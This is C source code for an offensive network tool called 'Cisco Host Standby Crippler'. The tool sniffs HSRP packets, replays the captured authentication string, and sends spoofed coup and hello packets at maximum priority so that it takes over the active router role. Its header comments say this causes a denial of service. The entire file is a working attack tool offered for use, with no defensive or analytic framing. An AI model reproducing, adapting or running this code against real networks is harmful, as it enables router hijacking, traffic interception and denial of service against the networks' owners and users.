//Cisco Host Standby Crippler
//By Big Poop root@networkpenetration.com
//
//You need libpcap installed
//To compile gcc *.c /usr/lib/libpcap.a -Wall -o hsrp_crippler
//Tested On Mandrake 8
//
//Use -S..... -C was only used during testing as i didn't have
//a router to hand for any of the initial development
//How it works...
//		1. Sniff for HSRP packets via libpcap
//		2. Create a spoofed packets from intial sniffed
//			packet
//		3. Send spoofed packets saying the this machine
//			has higher priority thus the active route
//			will be pre-empted causing a DoS for aslong
//			as the attack continues
//
//TODO... at some point i will add spoofed mac addresses via
//libnet.... only if i get bored :)
//

#include "HSRP.h"
#include <pcap.h>
//globals
struct ops o[0]; //Options Structure
struct in_addr addr; 
struct sockaddr *dest;
struct sockaddr_in s_in;
socklen_t destlen;

int datalink; //pcap_datalink
char *device; //pcap device
pcap_t *pd; //packet capture struct pointer
int rawfd; //raw socket
int fddipad; //fddi hack from UNP
int snaplen = 200;  //amount of data to grab

int main (int argc, char**argv)
{
	int c;
	char *ipaddr;

	printf("Cisco Hot Standby Router Protocol Crippler v" VER "\n");
	printf("By Big Poop root@networkpenetration.com\n");
	if (argc < 2)
	{
		usage(argv[0]);
		exit;
	}

	memset(&o, '\0', sizeof(o)); //clear options structure 
	opterr = 0;
	while ( (c=getopt(argc, argv, "SCdi:h:a:v:g:f:")) != -1){
		switch (c) {

			case 'S': o->sniff = 1;
				  break;

			case 'C': o->cripple = 1; //send coup
				  break;
			
			case 'h': o->hellotime = atoi(optarg);
				  break;
				  
			case 'a': strncpy(o->auth, optarg, sizeof(o->auth));
				  break;

			case 'v': if(!inet_aton(optarg, &o->virtualip)){
					printf("Malformed IP address: %s\n",optarg);
					exit;
				  }
				  break;
				  
			case 'g': o->group = atoi(optarg);
				  break;

			case 'i': device = optarg;
				  break;
			
			case 'f': if(!inet_aton(optarg, &o->spoofed)){
					  printf("Mallformed Spoof address: %s\n",optarg);
					  exit;
				  }
				  break;
				  
			default: usage(argv[0]);
				 exit(1);
		}
	}
	if(!o->hellotime) o->hellotime = 3;
	if(!o->group) o->group = 1;
	
	printf("\n");
	if((o->sniff) && (o->cripple)){
		printf("You can't sniff and send a constructed packet\n");
		exit(0);
	}

	if((!o->sniff) && (!o->cripple)){
		printf("You need to select either sniff (-S) or cripple (-C)\n");
		exit(0);
	}
	if(!o->sniff){
		ipaddr = argv[optind];
		if(!inet_aton((const char*)ipaddr, &addr)){
			printf("%s is an invalid IP address\n", ipaddr);
			exit(1);
		}
	}
	
	if(o->sniff){
		s_in.sin_family = AF_INET;
		s_in.sin_port = htons(1985); //HSRP port
		s_in.sin_addr.s_addr = inet_addr("224.0.0.2"); //multicast IP address
		opensniff();
		exit(0);
	}

	if(o->cripple){
		coup();
	}
	exit(0); //shouldn't reach here
}

//start sniffing packets
void opensniff()
{
	struct header *heada;
	open_pcap(); //start packet capture
	printf("Sniffing for HSRP packets......\n");
	heada = udpread(); //get a HSRP packet
	printf("Got a HSRP packet, details as follows\n");
	printf("Version: %x\n", heada->buf[0]);
	printf("Opcode: %x ", heada->buf[1]);
	if(heada->buf[1] == 0) {
		printf("Hello Opcode\n");
	}
	if(heada->buf[1] == 1) {
		printf("Coup Opcode\n");
	}
	if(heada->buf[1] == 2){
		printf("Resign Opcode\n");
	}
	printf("State: %d ", heada->buf[2]);
	if(heada->buf[2] == 0) {
		printf("Inital State\n");
	}
	if(heada->buf[2] == 1){
		printf("Learn State\n");
	}
	if(heada->buf[2] == 2){
		printf("Listen State\n");
	}
	if(heada->buf[2] == 4){
		printf("Speak State\n");
	}
	if(heada->buf[2] == 8){
		printf("Standby State\n");
	}
	if(heada->buf[2] == 16){
		printf("Active State\n");
	}
	printf("Hello time: %x\n", heada->buf[3]);
	printf("Hold time: %x\n", heada->buf[4]);
	printf("Priority: %x\n", heada->buf[5]);
	printf("Group: %x\n", heada->buf[6]);
	printf("Reserved: %x\n", heada->buf[7]);
	printf("Authentication: %c%c%c%c%c%c%c%c\n", heada->buf[8], heada->buf[9], heada->buf[10], heada->buf[11], heada->buf[12], heada->buf[13], heada->buf[14], heada->buf[15]);
	printf("Virtual IP: %x.%x.%x.%x\n", heada->buf[16], heada->buf[17], heada->buf[18], heada->buf[19]);
	sniffedcoup(heada);
	exit(0);
}

struct header *udpread()
{
	int len;
	char *ptr;
	struct ether_header *eptr;
	for( ; ; ){
		ptr = next_pcap(&len);
		switch(datalink) { 	//loopback header = 4
			case DLT_NULL: 
				return (udp_check(ptr+4, len -4));

			case DLT_EN10MB: 
				eptr = (struct ether_header *) ptr;
				if(ntohs(eptr->ether_type) != ETHERTYPE_IP){
					printf("Ethernet Type %x not IP", ntohs(eptr->ether_type));
					exit(1);
				}
				return (udp_check(ptr +14, len -14));
			
			case DLT_SLIP:	//slip header
				return(udp_check(ptr + 24, len -24));

			case DLT_PPP:  //ppp header
				return(udp_check(ptr + 24, len -24));

			default:
				printf("Unsupported datalink %d", datalink);
				exit(1);
					
		}
	}
}


struct header *
udp_check(char *ptr, int len)
{
	int hlen;
	struct ip *ip;
	struct header *hdr;
	if(len < sizeof(struct ip) + sizeof(struct udphdr)){
		printf("len = %d", len);
		exit(1);
	}

	ip = (struct ip *) ptr;
	if (ip->ip_v != IPVERSION) {
		printf("ip_v = %d", ip->ip_v);
		exit(1);
	}
	
	hlen = (ip->ip_hl << 2);
	if(hlen < sizeof(struct ip)){
		printf("ip_hl = %d", ip->ip_hl);
		exit(1);
	}
	
	if (len < hlen + sizeof(struct udphdr)){
		printf("len = %d, hlen = %d",len, hlen);
		exit(1);
	}
	
	if ((ip->ip_sum = in_chksum((u_short *) ip, hlen)) !=0){
		printf("ip checksum error");
		exit(1);
	}

	if (ip->ip_p == IPPROTO_UDP){
		hdr = (struct header *) ip;
		return (hdr);
	}
	else {	
		printf("not a udp packet\n");
		exit(1);
	}
}

#define CMD "udp and src port %d" //cmd line
void open_pcap(void)
{
	uint32_t localnet, netmask;
	char cmd[MAXLINE], errbuf[PCAP_ERRBUF_SIZE];
	struct bpf_program fcode;
	printf("Trying to open Pcap device\n");
	if (device == NULL){
		if((device = pcap_lookupdev(errbuf)) == NULL){
			printf("pcap_lookup: %s\n", errbuf);
			exit(1);
		}
	}
	printf("device = %s\n", device);

		//hardcode promisc = 0, to_ms = 500
	if((pd = pcap_open_live(device, snaplen, 0, 500, errbuf)) == NULL){
		printf("pcap_open_live: %s\n", errbuf);
		exit(1);
	}

	if (pcap_lookupnet(device, &localnet, &netmask, errbuf) < 0){
		printf("pcap_lookupnet: %s\n", errbuf);
		exit(1);
	}

	snprintf(cmd, sizeof(cmd), CMD, 1985);

	if (pcap_compile(pd, &fcode, cmd, 0, netmask) <0){
		printf("pcap compile: %s", pcap_geterr(pd));
		exit(1);
	}

	if (pcap_setfilter(pd, &fcode) < 0){
		printf("pcap_setfilter: %s", pcap_geterr(pd));
		exit(1);
	}
				
	if ((datalink = pcap_datalink(pd)) < 0){
		printf("pcap_datalink: %s", pcap_geterr(pd));
		exit(1);
	}
}

char *
next_pcap(int *len)
{
	char *ptr;
	struct pcap_pkthdr hdr;

	//loop until packet ready
	while((ptr = (char *) pcap_next(pd, &hdr)) == NULL);
	*len = hdr.caplen;
	return(ptr);
}

//non sniffed packets
void coup()
{	
	struct sockaddr_in sin;
	int sock;
	int sinlen;
	int on = 1; //used in setsockopt
	unsigned char *ipp;
	struct header heada;
	
	ipp = (unsigned char *) &o->virtualip.s_addr;
	
	memset(&heada, '\0', sizeof(heada));
	printf("sending coup command to preempt da server\n");
	heada.ip.ihl = 5;
	heada.ip.version = 4;
	heada.ip.tos = 0;
	heada.ip.tot_len = htons(40);
	heada.ip.frag_off = 0;
	heada.ip.ttl = 1; //may need to change
	heada.ip.protocol = IPPROTO_UDP;
	heada.ip.check = 0; //calculated after
	if(o->spoofed.s_addr){
		heada.ip.saddr = o->spoofed.s_addr; //spoofed address
	}
	else heada.ip.saddr = 0; //let kernel decide
	heada.ip.daddr = addr.s_addr; //use multicast address 224.0.0.2
	
	heada.udp.source = htons(1985);
	heada.udp.dest = htons(1985);
	heada.udp.len = htons(28); 
	heada.udp.check = 0; // u don't need a checksum apparently
	
	heada.buf[0] = 0x00; //version
	heada.buf[1] = 0x01; //opcode 1 = coup
	heada.buf[2] = 0x10; //state ACTIVE
	if(o->hellotime) heada.buf[3] = o->hellotime;
	else heada.buf[3] = 0x03; //hello time
	heada.buf[4] = 0xff; //holdtime 255
	heada.buf[5] = 0xff; //priority 255
	if(o->group) heada.buf[6] = o->group;
	else heada.buf[6] = 0x01; //group
	heada.buf[7] = 0x00; //reserved
	if(*o->auth){
		heada.buf[8] = o->auth[0]; 
		heada.buf[9] = o->auth[1]; 
		heada.buf[10] = o->auth[2]; 
		heada.buf[11] = o->auth[3]; 
		heada.buf[12] = o->auth[4]; 
		heada.buf[13] = o->auth[5]; 
		heada.buf[14] = o->auth[6]; 
		heada.buf[15] = o->auth[7]; 

	}
	else{
		//default
		heada.buf[8] = 0x63;//c
		heada.buf[9] = 0x69;//i
		heada.buf[10] = 0x73;//s
		heada.buf[11] = 0x63;//c
		heada.buf[12] = 0x6f;//o
		heada.buf[13] = 0x00;//padding
		heada.buf[14] = 0x00;//padding
		heada.buf[15] = 0x00;//padding
	}
	
	heada.buf[16] = ipp[0]; //virtual ip
	heada.buf[17] = ipp[1]; //virtual ip
	heada.buf[18] = ipp[2]; //virtual ip
	heada.buf[19] = ipp[3]; //virtual ip
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = addr.s_addr; 
	 
	sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
	if(sock < 0){
		printf("socket broke\n");
		exit;
	}
	
	heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20);

	sinlen = sizeof(sin);
	if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
		printf("sendto error\n");
		exit;
	}
	close(sock);
	printf("sent coup packet....\n");
	hello();
}

//more non sniffed stuff
void hello()
{	
	int sock, sinlen, delay, on =1;
	struct sockaddr_in sin;
	unsigned char *ipp;
	struct header heada;
	ipp = (unsigned char *) &o->virtualip.s_addr;
	
	memset(&heada, '\0', sizeof(heada));
	printf("Sending hello messages, press CTRL+C when u had enough\n");
	heada.ip.ihl = 5;
	heada.ip.version = 4;
	heada.ip.tos = 0;
	heada.ip.tot_len = htons(40);
	heada.ip.frag_off = 0;
	heada.ip.ttl = 1; //may need to change
	heada.ip.protocol = IPPROTO_UDP;
	heada.ip.check = 0;
	if(o->spoofed.s_addr){
		heada.ip.saddr = o->spoofed.s_addr; //spoofed
	}
	else heada.ip.saddr = 0; //let kernal decide
	heada.ip.daddr = addr.s_addr; //but using multicast address 224.0.0.2 so?
		
	heada.udp.source = htons(1985);
	heada.udp.dest = htons(1985);
	heada.udp.len = htons(28); 
	heada.udp.check = 0; // u don't need a checksum apparently
	
	heada.buf[0] = 0x00; //version
	heada.buf[1] = 0x00; //opcode 0 = hello
	heada.buf[2] = 0x10; //state ACTIVE
	if(o->hellotime) heada.buf[3] = o->hellotime;
	else heada.buf[3] = 0x03; //hello time 3 second default
	heada.buf[4] = 0xff; //holdtime 255
	heada.buf[5] = 0xff; //priority 255
	if(o->group) heada.buf[6] = o->group;
	else heada.buf[6] = 0x01; //group
	heada.buf[7] = 0x00; //reserved
	if(*o->auth){
		heada.buf[8] = o->auth[0]; 
		heada.buf[9] = o->auth[1]; 
		heada.buf[10] = o->auth[2]; 
		heada.buf[11] = o->auth[3]; 
		heada.buf[12] = o->auth[4]; 
		heada.buf[13] = o->auth[5]; 
		heada.buf[14] = o->auth[6]; 
		heada.buf[15] = o->auth[7]; 

	}
	else{
		//default
		heada.buf[8] = 0x63; //c
		heada.buf[9] = 0x69; //i
		heada.buf[10] = 0x73; //s
		heada.buf[11] = 0x63; //c
		heada.buf[12] = 0x6f; //o
		heada.buf[13] = 0x00; //padding
		heada.buf[14] = 0x00; //padding
		heada.buf[15] = 0x00; //padding
	}
	
	heada.buf[16] = ipp[0]; //virtual ip
	heada.buf[17] = ipp[1]; //virtual ip
	heada.buf[18] = ipp[2]; //virtual ip
	heada.buf[19] = ipp[3]; //virtual ip
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = addr.s_addr; 
	 
	heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20); //sort out packet checksum

	sinlen = sizeof(sin);
	if(o->hellotime) delay = o->hellotime;
	else delay = 3;
	signal(SIGTERM, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGHUP, cleanup);
	for ( ; ; ){
		sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); //create socket
		setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); //set socket options
		if(sock < 0){
			printf("socket broke\n");
			exit;
		}
		if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
			//send packet
			printf("sendto error\n");
			exit;
		}
		close(sock);
		printf(".");
		sleep(delay);
	}
	printf("\n");
}


//Sniffed version of coup
void sniffedcoup(struct header *headz)
{
	int sock, sinlen, on = 1;
	struct sockaddr_in sin;
	unsigned char *ipp;
	struct header heada;
	
	ipp = (unsigned char *) &o->virtualip.s_addr;
	
	memset(&heada, '\0', sizeof(heada)); //clear heada 
	printf("Sending sniffed coup command to preempt the router\n");
	heada.ip.ihl = 5;
	heada.ip.version = 4;
	heada.ip.tos = 0;
	heada.ip.tot_len = htons(40);
	heada.ip.frag_off = 0;
	heada.ip.ttl = 1; 
	heada.ip.protocol = IPPROTO_UDP;
	heada.ip.check = 0;
	if(o->spoofed.s_addr){ 
		heada.ip.saddr = o->spoofed.s_addr;
	}
	else heada.ip.saddr = 0; //let kernal decide 
	heada.ip.daddr = inet_addr("224.0.0.2"); //use multicast address 
	
	heada.udp.source = htons(1985);
	heada.udp.dest = htons(1985);
	heada.udp.len = htons(28); 
	heada.udp.check = 0; // u don't need a checksum apparently
	
	heada.buf[0] = 0x00; //version
	heada.buf[1] = 0x01; //opcode 1 = coup
	heada.buf[2] = 0x10; //state ACTIVE
	heada.buf[3] = headz->buf[3];
	heada.buf[4] = headz->buf[4]; //holdtime 255
	heada.buf[5] = 0xff; //priority 255
	heada.buf[6] = headz->buf[6]; //group
	heada.buf[7] = 0x00; //reserved
	heada.buf[8] = headz->buf[8]; //8 byte password 
	heada.buf[9] = headz->buf[9]; 
	heada.buf[10] = headz->buf[10]; 
	heada.buf[11] = headz->buf[11]; 
	heada.buf[12] = headz->buf[12]; 
	heada.buf[13] = headz->buf[13]; 
	heada.buf[14] = headz->buf[14]; 
	heada.buf[15] = headz->buf[15]; 

	heada.buf[16] = headz->buf[16]; //virtual ip
	heada.buf[17] = headz->buf[17]; //virtual ip
	heada.buf[18] = headz->buf[18]; //virtual ip
	heada.buf[19] = headz->buf[19]; //virtual ip
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = inet_addr("224.0.0.2"); 
	 
	sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
	if(sock < 0){
		printf("socket broke\n");
		exit;
	}
	
	heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20);

	sinlen = sizeof(sin);
	if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
		printf("sendto error\n");
		exit;
	}
	close(sock);
	printf("sent sniffed coup packet....\n");
	sniffedhello(headz);
}


//sniffed version of hello
void sniffedhello(struct header *headz)
{
	int sock;
	struct sockaddr_in sin;
	int sinlen;
	int on = 1; //used in setsockopt
	unsigned char *ipp;
	struct header heada;
	ipp = (unsigned char *) &o->virtualip.s_addr;
	
	memset(&heada, '\0', sizeof(heada));
	printf("Sending sniffed hello packets, press CTRL+C when u have finished\n");
	heada.ip.ihl = 5;
	heada.ip.version = 4;
	heada.ip.tos = 0;
	heada.ip.tot_len = htons(40);
	heada.ip.frag_off = 0;
	heada.ip.ttl = 1; //may need to change
	heada.ip.protocol = IPPROTO_UDP;
	heada.ip.check = 0;
	if(o->spoofed.s_addr){
		heada.ip.saddr = o->spoofed.s_addr;
	}
	else heada.ip.saddr = 0; //let kernal decide
	heada.ip.daddr = inet_addr("224.0.0.2");//use multicast address 224.0.0.2
	
	heada.udp.source = htons(1985);
	heada.udp.dest = htons(1985);
	heada.udp.len = htons(28); 
	heada.udp.check = 0; // u don't need a checksum apparently
	
	heada.buf[0] = 0x00; //version
	heada.buf[1] = 0x00; //opcode 0 = hello
	heada.buf[2] = 0x10; //state ACTIVE
	heada.buf[3] = headz->buf[3]; //hello time
	heada.buf[4] = headz->buf[4]; //holdtime 255
	heada.buf[5] = 0xff; //priority 255
	heada.buf[6] = headz->buf[6]; //group
	heada.buf[7] = 0x00; //reserved
	heada.buf[8] = headz->buf[8]; //sniffed 8byte authenticatin
	heada.buf[9] = headz->buf[9]; 
	heada.buf[10] = headz->buf[10]; 
	heada.buf[11] = headz->buf[11]; 
	heada.buf[12] = headz->buf[12]; 
	heada.buf[13] = headz->buf[13]; 
	heada.buf[14] = headz->buf[14]; 
	heada.buf[15] = headz->buf[15]; 
	
	heada.buf[16] = headz->buf[16]; //virtual ip
	heada.buf[17] = headz->buf[17]; //virtual ip
	heada.buf[18] = headz->buf[18]; //virtual ip
	heada.buf[19] = headz->buf[19]; //virtual ip
	
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = inet_addr("224.0.0.2"); 
	
	signal(SIGTERM, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGHUP, cleanup);
	for( ; ; ){
		
		sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
		setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
		if(sock < 0){
			printf("socket broke\n");
			exit;
		}
	
		heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20);

		sinlen = sizeof(sin);
		if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
			printf("sendto error\n");
			exit;
		}
		close(sock);
		printf(".");
		sleep(headz->buf[3]); //hello time
	}
}

void cleanup(int sigio)
{
	printf("\nFinished attackin the router.....\n");
	exit(0);
}
	
//work out IP checksum
unsigned short in_chksum(unsigned short *pts, int nbytes)
{
	register long sum;
	u_short oddbyte;
	register u_short answer;

	sum = 0;
	while(nbytes > 1){
		sum += *pts++;
		nbytes -=2;
	}

	if(nbytes == 1){
		oddbyte = 0;
		*((u_char *) &oddbyte) = *(u_char *)pts;
		sum += oddbyte;
	}

	sum = (sum >> 16) + (sum &0xffff);
	sum += (sum >>16);
	answer = ~sum;
	return(answer);
}


//print usage
void usage(char *progname)
{
	printf(	"\n-S Sniff the network for all the required values then cripple the active router\n"\
		"-C Attempt to cripple the active router by sending fake packets\n"\
		"-f <spoofed IP> Send packets with spoofed source IP\n"\
		"-h <seconds> How often to send hello packets (default 3 secs)\n"\
		"-g <group> group number\n"\
		"-v <ip address> Specify virtual IP address\n"\
		"-a <Max 8 chars> Authenication string, if non specifed default used\n"\
		"-i <NIC> Specify Network Interface Card to sniff\n\n"\
		"Example: %s -C -h3 -g1 -v 123.123.123.123 -a monkey 224.0.0.2\n"\
		"Example: %s -S -i eth0 -f 1.2.3.4\n\n", progname, progname);
	exit(0);
}
